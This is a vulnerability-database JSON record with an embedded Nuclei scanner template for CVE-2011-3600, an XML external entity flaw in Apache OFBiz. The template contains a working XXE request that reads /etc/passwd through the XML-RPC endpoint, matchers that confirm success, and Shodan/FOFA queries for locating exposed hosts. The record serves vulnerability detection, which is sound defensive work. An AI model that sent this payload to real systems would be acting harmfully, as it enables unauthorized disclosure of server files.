{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2011-3600/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2011-3600/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2011-3600/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2011-3600/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2011-3600/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2011-3600"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2011-3600"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2011/CVE-2011-3600.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2011-3600\n\ninfo:\n  name: Apache OFBiz - XML External Entity Injection\n  author: daffainfo,pikpikcu\n  severity: high\n  description: |\n    The /webtools/control/xmlrpc endpoint in OFBiz XML-RPC event handler is exposed to External Entity Injection by passing DOCTYPE declarations with executable payloads that discloses the contents of files in the filesystem. In addition, it can also be used to probe for open network ports, and figure out from returned error messages whether a file exists or not. This affects OFBiz 16.11.01 to 16.11.04.\n  impact: |\n    Attackers can disclose sensitive filesystem data, probe network ports, and determine file existence, leading to information disclosure and potential further exploitation.\n  remediation: |\n    Update to the latest OFBiz version or apply security patches addressing XML external entity vulnerabilities.\n  reference:\n    - https://lists.apache.org/thread/cwz2v0b6pnxvqrnsd0hj3l80g9qq5kd8\n    - https://nvd.nist.gov/vuln/detail/CVE-2011-3600\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2011-3600\n    cwe-id: CWE-611\n    epss-score: 0.1591\n    epss-percentile: 0.96738\n    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: apache\n    product: ofbiz\n    shodan-query:\n      - http.html:\"ofbiz\"\n      - ofbiz.visitor=\n    fofa-query:\n      - body=\"ofbiz\"\n      - app=\"apache_ofbiz\"\n  tags: cve,cve2011,apache,ofbiz,xxe,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /webtools/control/xmlrpc HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/xml\n\n        <?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file:////etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n          - \"faultString\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220543440904f8f2c3da0a38b6c057c53159eb3417ca6d4fbb7548291543ff06348022100c5ee041e5ffd96c82323c0fd2f4229cbd55727d0fd43bfd98bf399440211699c:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2011-3600"
}